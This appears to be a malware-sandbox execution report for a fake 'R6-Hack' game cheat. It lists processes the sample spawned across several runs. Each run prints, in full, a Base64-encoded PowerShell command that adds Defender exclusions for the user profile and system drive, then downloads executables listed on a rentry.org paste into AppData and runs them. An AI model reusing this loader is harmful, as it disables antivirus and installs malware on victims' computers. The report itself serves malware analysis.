JABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGwAbgBrAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAIAAkAHcAYwAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJABsAG4AawBbACQAaQBdACwAIAA8ACMAbgBtAHkAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBjAHAAZwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBqAGkAZwAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAKAAkAGYAbgAgACsAIAAkAGkALgBUAG8AUwB0AHIAaQBuAGcAKAApACAAKwAgACcALgBlAHgAZQAnACkAKQApACAAfQA8ACMAYgB3AGYAIwA+ADsAIABmAG8AcgAgACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGwAbgBrAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAbgB6AHoAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHEAdQBhACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAoACQAZgBuACAAKwAgACQAaQAuAFQAbwBTAHQAcgBpAG4AZwAoACkAIAArACAAJwAuAGUAeABlACcAKQApACAAfQAgADwAIwBpAGQAegAjAD4A"
2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:2188

C:\Users\Admin\AppData\Roaming\q5hhwwsm.5lv0.exe
"C:\Users\Admin\AppData\Roaming\q5hhwwsm.5lv0.exe"
3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:884

C:\Users\Admin\AppData\Roaming\q5hhwwsm.5lv1.exe
"C:\Users\Admin\AppData\Roaming\q5hhwwsm.5lv1.exe"
3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:2140

C:\Users\Admin\AppData\Roaming\q5hhwwsm.5lv2.exe
"C:\Users\Admin\AppData\Roaming\q5hhwwsm.5lv2.exe"
3⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:3560

C:\Users\Admin\AppData\Roaming\q5hhwwsm.5lv3.exe
"C:\Users\Admin\AppData\Roaming\q5hhwwsm.5lv3.exe"
3⤵
- Checks computer location settings
- Executes dropped EXE
PID:4116

C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\7683.tmp\7684.tmp\7685.bat C:\Users\Admin\AppData\Roaming\q5hhwwsm.5lv3.exe"
4⤵
PID:4540

C:\Windows\system32\where.exe
where node
5⤵
PID:5248

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Invoke-WebRequest -Uri 'https://nodejs.org/dist/v20.12.2/node-v20.12.2-x64.msi' -OutFile 'nodejs-installer.msi'"
5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:5272

C:\Users\Admin\Downloads\R6-Hack-main\R6-Hack-main\r6s.exe
"C:\Users\Admin\Downloads\R6-Hack-main\R6-Hack-main\r6s.exe"
1⤵
PID:1868

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAagBpACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAZwBhAHAAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAegBrAGQAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAaABlAHAAIwA+ADsAJAB3AGMAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkAOwAkAGwAbgBrACAAPQAgACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AcgBlAG4AdAByAHkALgBvAHIAZwAvAGwAZQBtADYAMQAxADEAMQAxADEAMQAxADEAMQAvAHIAYQB3ACcAKQAuAFMAcABsAGkAdAAoAFsAcwB0AHIAaQBuAGcAWwBdAF0AIgBgAHIAYABuACIALAAgAFsAUwB0AHIAaQBuAGcAUwBwAGwAaQB0AE8AcAB0AGkAbwBuAHMAXQA6ADoATgBvAG4AZQApADsAIAAkAGYAbgAgAD0AIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AUABhAHQAaABdADoAOgBHAGUAdABSAGEAbgBkAG8AbQBGAGkAbABlAE4AYQBtAGUAKAApADsAIABmAG8AcgAgACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGwAbgBrAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAIAAkAHcAYwAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJABsAG4AawBbACQAaQBdACwAIAA8ACMAbgBtAHkAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBjAHAAZwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBqAGkAZwAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAKAAkAGYAbgAgACsAIAAkAGkALgBUAG8AUwB0AHIAaQBuAGcAKAApACAAKwAgACcALgBlAHgAZQAnACkAKQApACAAfQA8ACMAYgB3AGYAIwA+ADsAIABmAG8AcgAgACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGwAbgBrAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAbgB6AHoAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHEAdQBhACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAoACQAZgBuACAAKwAgACQAaQAuAFQAbwBTAHQAcgBpAG4AZwAoACkAIAArACAAJwAuAGUAeABlACcAKQApACAAfQAgADwAIwBpAGQAegAjAD4A"
2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:4744

C:\Users\Admin\AppData\Roaming\xirquh4o.icu0.exe
"C:\Users\Admin\AppData\Roaming\xirquh4o.icu0.exe"
3⤵
- Executes dropped EXE
PID:3540

C:\Users\Admin\AppData\Local\Programs\Steam\Steam.exe
"C:\Users\Admin\AppData\Local\Programs\Steam\Steam.exe"
4⤵
PID:5432

C:\Users\Admin\AppData\Local\Programs\Steam\Steam.exe
"C:\Users\Admin\AppData\Local\Programs\Steam\Steam.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Roaming\Steam" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1720,i,13577362472968387261,17626338959852663881,262144 --enable-features=kWebSQLAccess --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand --variations-seed-version --mojo-platform-channel-handle=1712 /prefetch:2
5⤵
PID:4992

C:\Windows\system32\cscript.exe
cscript.exe
5⤵
PID:6128

C:\Users\Admin\AppData\Local\Programs\Steam\Steam.exe
"C:\Users\Admin\AppData\Local\Programs\Steam\Steam.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Roaming\Steam" --field-trial-handle=1940,i,13577362472968387261,17626338959852663881,262144 --enable-features=kWebSQLAccess --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand --variations-seed-version --mojo-platform-channel-handle=1936 /prefetch:3
5⤵
PID:4300

C:\Windows\system32\cscript.exe
cscript.exe //Nologo C:\Users\Admin\AppData\Local\Programs\Steam\resources\app.asar.unpacked\node_modules\regedit\vbs\regList.wsf A HKCU\Software\Valve\Steam
5⤵
PID:5336

C:\Users\Admin\AppData\Roaming\xirquh4o.icu1.exe
"C:\Users\Admin\AppData\Roaming\xirquh4o.icu1.exe"
3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:4676

C:\Users\Admin\AppData\Roaming\xirquh4o.icu2.exe
"C:\Users\Admin\AppData\Roaming\xirquh4o.icu2.exe"
3⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:60

C:\Users\Admin\AppData\Roaming\xirquh4o.icu3.exe
"C:\Users\Admin\AppData\Roaming\xirquh4o.icu3.exe"
3⤵
- Checks computer location settings
- Executes dropped EXE
PID:2652

C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\7133.tmp\7134.tmp\7135.bat C:\Users\Admin\AppData\Roaming\xirquh4o.icu3.exe"
4⤵
PID:552

C:\Windows\system32\where.exe
where node
5⤵
PID:5216

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Invoke-WebRequest -Uri 'https://nodejs.org/dist/v20.12.2/node-v20.12.2-x64.msi' -OutFile 'nodejs-installer.msi'"
5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:5264

C:\Users\Admin\Downloads\R6-Hack-main\R6-Hack-main\r6s.exe
"C:\Users\Admin\Downloads\R6-Hack-main\R6-Hack-main\r6s.exe"
1⤵
PID:4320

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAagBpACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAZwBhAHAAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAegBrAGQAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAaABlAHAAIwA+ADsAJAB3AGMAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkAOwAkAGwAbgBrACAAPQAgACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AcgBlAG4AdAByAHkALgBvAHIAZwAvAGwAZQBtADYAMQAxADEAMQAxADEAMQAxADEAMQAvAHIAYQB3ACcAKQAuAFMAcABsAGkAdAAoAFsAcwB0AHIAaQBuAGcAWwBdAF0AIgBgAHIAYABuACIALAAgAFsAUwB0AHIAaQBuAGcAUwBwAGwAaQB0AE8AcAB0AGkAbwBuAHMAXQA6ADoATgBvAG4AZQApADsAIAAkAGYAbgAgAD0AIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AUABhAHQAaABdADoAOgBHAGUAdABSAGEAbgBkAG8AbQBGAGkAbABlAE4AYQBtAGUAKAApADsAIABmAG8AcgAgACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGwAbgBrAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAIAAkAHcAYwAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJABsAG4AawBbACQAaQBdACwAIAA8ACMAbgBtAHkAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBjAHAAZwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBqAGkAZwAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAKAAkAGYAbgAgACsAIAAkAGkALgBUAG8AUwB0AHIAaQBuAGcAKAApACAAKwAgACcALgBlAHgAZQAnACkAKQApACAAfQA8ACMAYgB3AGYAIwA+ADsAIABmAG8AcgAgACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGwAbgBrAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAbgB6AHoAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHEAdQBhACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAoACQAZgBuACAAKwAgACQAaQAuAFQAbwBTAHQAcgBpAG4AZwAoACkAIAArACAAJwAuAGUAeABlACcAKQApACAAfQAgADwAIwBpAGQAegAjAD4A"
2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:1868

C:\Users\Admin\AppData\Roaming\euljj2a5.0dl0.exe
"C:\Users\Admin\AppData\Roaming\euljj2a5.0dl0.exe"
3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5184

C:\Users\Admin\AppData\Roaming\euljj2a5.0dl1.exe
"C:\Users\Admin\AppData\Roaming\euljj2a5.0dl1.exe"
3⤵
- Executes dropped EXE
PID:3644

C:\Users\Admin\AppData\Roaming\euljj2a5.0dl2.exe
"C:\Users\Admin\AppData\Roaming\euljj2a5.0dl2.exe"
3⤵
- Executes dropped EXE
PID:5704

C:\Users\Admin\AppData\Roaming\euljj2a5.0dl3.exe
"C:\Users\Admin\AppData\Roaming\euljj2a5.0dl3.exe"
3⤵
- Checks computer location settings
- Executes dropped EXE
PID:5676

C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\CEA5.tmp\CEA6.tmp\CEA7.bat C:\Users\Admin\AppData\Roaming\euljj2a5.0dl3.exe"
4⤵
PID:5260

C:\Windows\system32\where.exe
where node
5⤵
PID:4432

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Invoke-WebRequest -Uri 'https://nodejs.org/dist/v20.12.2/node-v20.12.2-x64.msi' -OutFile 'nodejs-installer.msi'"
5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
PID:3764

C:\Users\Admin\Downloads\R6-Hack-main\R6-Hack-main\r6s.exe
"C:\Users\Admin\Downloads\R6-Hack-main\R6-Hack-main\r6s.exe"
1⤵
PID:4464

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAagBpACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAZwBhAHAAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAegBrAGQAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAaABlAHAAIwA+ADsAJAB3AGMAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkAOwAkAGwAbgBrACAAPQAgACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AcgBlAG4AdAByAHkALgBvAHIAZwAvAGwAZQBtADYAMQAxADEAMQAxADEAMQAxADEAMQAvAHIAYQB3ACcAKQAuAFMAcABsAGkAdAAoAFsAcwB0AHIAaQBuAGcAWwBdAF0AIgBgAHIAYABuACIALAAgAFsAUwB0AHIAaQBuAGcAUwBwAGwAaQB0AE8AcAB0AGkAbwBuAHMAXQA6ADoATgBvAG4AZQApADsAIAAkAGYAbgAgAD0AIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AUABhAHQAaABdADoAOgBHAGUAdABSAGEAbgBkAG8AbQBGAGkAbABlAE4AYQBtAGUAKAApADsAIABmAG8AcgAgACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGwAbgBrAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAIAAkAHcAYwAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJABsAG4AawBbACQAaQBdACwAIAA8ACMAbgBtAHkAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBjAHAAZwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBqAGkAZwAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAKAAkAGYAbgAgACsAIAAkAGkALgBUAG8AUwB0AHIAaQBuAGcAKAApACAAKwAgACcALgBlAHgAZQAnACkAKQApACAAfQA8ACMAYgB3AGYAIwA+ADsAIABmAG8AcgAgACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGwAbgBrAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAbgB6AHoAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHEAdQBhACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAoACQAZgBuACAAKwAgACQAaQAuAFQAbwBTAHQAcgBpAG4AZwAoACkAIAArACAAJwAuAGUAeABlACcAKQApACAAfQAgADwAIwBpAGQAegAjAD4A"
2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:1096

C:\Users\Admin\AppData\Roaming\ygx1vsb5.1kt0.exe
"C:\Users\Admin\AppData\Roaming\ygx1vsb5.1kt0.exe"
3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:116

C:\Users\Admin\AppData\Roaming\ygx1vsb5.1kt1.exe
"C:\Users\Admin\AppData\Roaming\ygx1vsb5.1kt1.exe"
3⤵
- Executes dropped EXE
PID:4508

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
4⤵
PID:5036

C:\Users\Admin\AppData\Roaming\ygx1vsb5.1kt2.exe
"C:\Users\Admin\AppData\Roaming\ygx1vsb5.1kt2.exe"
3⤵
- Executes dropped EXE
PID:5348

C:\Users\Admin\AppData\Roaming\ygx1vsb5.1kt3.exe
"C:\Users\Admin\AppData\Roaming\ygx1vsb5.1kt3.exe"
3⤵
- Checks computer location settings
- Executes dropped EXE
PID:2940

C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\DCFD.tmp\DCFE.tmp\DCFF.bat C:\Users\Admin\AppData\Roaming\ygx1vsb5.1kt3.exe"
4⤵
PID:3712

C:\Windows\system32\where.exe
where node
5⤵
PID:3252

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Invoke-WebRequest -Uri 'https://nodejs.org/dist/v20.12.2/node-v20.12.2-x64.msi' -OutFile 'nodejs-installer.msi'"
5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
PID:6068

C:\Users\Admin\Downloads\R6-Hack-main\R6-Hack-main\r6s.exe
"C:\Users\Admin\Downloads\R6-Hack-main\R6-Hack-main\r6s.exe"
1⤵
PID:5652

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAagBpACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAZwBhAHAAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAegBrAGQAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAaABlAHAAIwA+ADsAJAB3AGMAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkAOwAkAGwAbgBrACAAPQAgACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AcgBlAG4AdAByAHkALgBvAHIAZwAvAGwAZQBtADYAMQAxADEAMQAxADEAMQAxADEAMQAvAHIAYQB3ACcAKQAuAFMAcABsAGkAdAAoAFsAcwB0AHIAaQBuAGcAWwBdAF0AIgBgAHIAYABuACIALAAgAFsAUwB0AHIAaQBuAGcAUwBwAGwAaQB0AE8AcAB0AGkAbwBuAHMAXQA6ADoATgBvAG4AZQApADsAIAAkAGYAbgAgAD0AIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AUABhAHQAaABdADoAOgBHAGUAdABSAGEAbgBkAG8AbQBGAGkAbABlAE4AYQBtAGUAKAApADsAIABmAG8AcgAgACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGwAbgBrAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAIAAkAHcAYwAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJABsAG4AawBbACQAaQBdACwAIAA8ACMAbgBtAHkAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBjAHAAZwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBqAGkAZwAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAKAAkAGYAbgAgACsAIAAkAGkALgBUAG8AUwB0AHIAaQBuAGcAKAApACAAKwAgACcALgBlAHgAZQAnACkAKQApACAAfQA8ACMAYgB3AGYAIwA+ADsAIABmAG8AcgAgACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGwAbgBrAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAbgB6AHoAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHEAdQBhACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAoACQAZgBuACAAKwAgACQAaQAuAFQAbwBTAHQAcgBpAG4AZwAoACkAIAArACAAJwAuAGUAeABlACcAKQApACAAfQAgADwAIwBpAGQAegAjAD4A"
2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
PID:5736

C:\Users\Admin\AppData\Roaming\ivzz1ktx.gzg0.exe
"C:\Users\Admin\AppData\Roaming\ivzz1ktx.gzg0.exe"
3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5844

C:\Users\Admin\AppData\Roaming\ivzz1ktx.gzg1.exe
"C:\Users\Admin\AppData\Roaming\ivzz1ktx.gzg1.exe"
3⤵
- Executes dropped EXE
PID:1296

C:\Users\Admin\AppData\Roaming\ivzz1ktx.gzg2.exe
"C:\Users\Admin\AppData\Roaming\ivzz1ktx.gzg2.exe"
3⤵
- Executes dropped EXE
PID:3448

C:\Users\Admin\AppData\Roaming\ivzz1ktx.gzg3.exe
"C:\Users\Admin\AppData\Roaming\ivzz1ktx.gzg3.exe"
3⤵
- Checks computer location settings
- Executes dropped EXE
PID:432

C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\E52B.tmp\E52C.tmp\E52D.bat C:\Users\Admin\AppData\Roaming\ivzz1ktx.gzg3.exe"
4⤵
PID:3524

C:\Windows\system32\where.exe
where node
5⤵
PID:6128

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Invoke-WebRequest -Uri 'https://nodejs.org/dist/v20.12.2/node-v20.12.2-x64.msi' -OutFile 'nodejs-installer.msi'"
5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
PID:2040

C:\Users\Admin\Downloads\R6-Hack-main\R6-Hack-main\r6s.exe
"C:\Users\Admin\Downloads\R6-Hack-main\R6-Hack-main\r6s.exe"
1⤵
PID:2332

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAagBpACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAZwBhAHAAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAegBrAGQAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAaABlAHAAIwA+ADsAJAB3AGMAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkAOwAkAGwAbgBrACAAPQAgACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AcgBlAG4AdAByAHkALgBvAHIAZwAvAGwAZQBtADYAMQAxADEAMQAxADEAMQAxADEAMQAvAHIAYQB3ACcAKQAuAFMAcABsAGkAdAAoAFsAcwB0AHIAaQBuAGcAWwBdAF0AIgBgAHIAYABuACIALAAgAFsAUwB0AHIAaQBuAGcAUwBwAGwAaQB0AE8AcAB0AGkAbwBuAHMAXQA6ADoATgBvAG4AZQApADsAIAAkAGYAbgAgAD0AIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AUABhAHQAaABdADoAOgBHAGUAdABSAGEAbgBkAG8AbQBGAGkAbABlAE4AYQBtAGUAKAApADsAIABmAG8AcgAgACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGwAbgBrAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAIAAkAHcAYwAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJABsAG4AawBbACQAaQBdACwAIAA8ACMAbgBtAHkAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBjAHAAZwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBqAGkAZwAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAKAAkAGYAbgAgACsAIAAkAGkALgBUAG8AUwB0AHIAaQBuAGcAKAApACAAKwAgACcALgBlAHgAZQAnACkAKQApACAAfQA8ACMAYgB3AGYAIwA+ADsAIABmAG8AcgAgACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGwAbgBrAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAbgB6AHoAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHEAdQBhACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAoACQAZgBuACAAKwAgACQAaQAuAFQAbwBTAHQAcgBpAG4AZwAoACkAIAArACAAJwAuAGUAeABlACcAKQApACAAfQAgADwAIwBpAGQAegAjAD4A"
2⤵
- Command and Scripting Interpreter: PowerShell
PID:5712

C:\Users\Admin\AppData\Roaming\deskhi2w.gqd0.exe
"C:\Users\Admin\AppData\Roaming\deskhi2w.gqd0.exe"
3⤵
PID:4432

C:\Users\Admin\AppData\Roaming\deskhi2w.gqd1.exe
"C:\Users\Admin\AppData\Roaming\deskhi2w.gqd1.exe"
3⤵
PID:3760

C:\Users\Admin\AppData\Roaming\deskhi2w.gqd2.exe
"C:\Users\Admin\AppData\Roaming\deskhi2w.gqd2.exe"
3⤵
PID:4604

